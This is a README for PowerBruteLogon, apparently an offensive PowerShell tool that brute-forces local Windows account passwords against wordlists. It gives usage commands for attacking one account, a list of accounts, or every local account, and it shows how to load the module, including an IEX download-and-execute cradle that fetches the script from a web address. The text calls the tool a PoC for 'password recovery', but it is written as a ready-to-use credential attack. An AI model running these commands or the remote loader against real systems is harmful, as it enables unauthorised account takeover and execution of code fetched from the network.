PowerBruteLogon is a ported version of WinBruteLogon in pure PowerShell

⚠️ Notice: this version is slower than WinBruteLogon but has the serious advantage of being 100% entirely coded in PowerShell. In a near future, password attempts will be distributed to separate threads to speed up the process. Also keep in mind that this method is very noisy, each failed attempt will get logged on Microsoft Windows Event Logs.

You might find useful information about the technique used in this PoC here

You can use this PowerShell Application whether as a PowerShell Script or as a PowerShell Module.

To be available, the module must first be present in a registered module path.

You can list module paths with following command:

Write-Output $env:PSModulePath

Example Output:

C:\Users\Phrozen\Documents\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules

Copy the module file <module_name>.psm1 to desired module path.

You can use bellow command to check if your module was successfully imported:

Get-Module -ListAvailable

Example Output:

PS C:\Users\Phrozen\Desktop> Get-Module -ListAvailable


    Directory: C:\Users\Phrozen\Documents\WindowsPowerShell\Modules


ModuleType Version    Name                                ExportedCommands
---------- -------    ----                                ----------------
Manifest   <version>  <module_name>                       <available_exported_commands>

<..snip..>

If you don't see them, run the following commands and check back.

Import-Module <module_name>

Import-Module <module_name>

It is not mandatory to install this application as a PowerShell module (Even if file extension is *.psm1)

You can also load it as a PowerShell Script. Multiple methods exists including:

Invoking Commands Using:

IEX (Get-Content .\<module_name>.psm1 -Raw)

Loading script from a remote location:

IEX (New-Object Net.WebClient).DownloadString('http://127.0.0.1/<module_name>.psm1')

Invoke-BruteLogonAccount
Invoke-BruteLogonList
Invoke-BruteAvailableLogons

Attempt to recover the password of a single defined Windows User Account.

* = Mandatory Options

Invoke-BruteLogonAccount -Username "darkcodersc" -Wordlist "C:\Temp\Wordlist.txt"`

Attempt to recover the password of a list of Windows User Account.

* = Mandatory Options

Invoke-BruteLogonList -UserList "C:\Temp\users.txt" -WordList "C:\Temp\Wordlist.txt"

Attempt to recover the password of all available local Windows User Accounts.

* = Mandatory Options

Invoke-BruteAvailableLogons -WordList "C:\Temp\Wordlist.txt"

Invoke-BruteAvailableLogons -WordList "C:\Temp\Wordlist.txt" -IgnoreUsers "Phrozen"

PowerBruteLogon supports account lockout detection. When account lockout is configured on Windows (⚠️ recommended).

You will see the following message printed on screen:

You might find the PowerShell progressbar ennoying, for this reason you might want to remove bellow code:

# Display Progress / Stats
$perc = [math]::Round((100 * $currPos) / $candidateCount)
$activity = [string]::Format("Testing candidate ""{0}"" for username ""{1}""", $candidate, $targetUser)
$status = [string]::Format("$perc% Complete:{0}/{1}", $currPos, $candidateCount)

Write-Progress -Activity $activity -Status $status -PercentComplete $perc

Made with ❤️ in 🇫🇷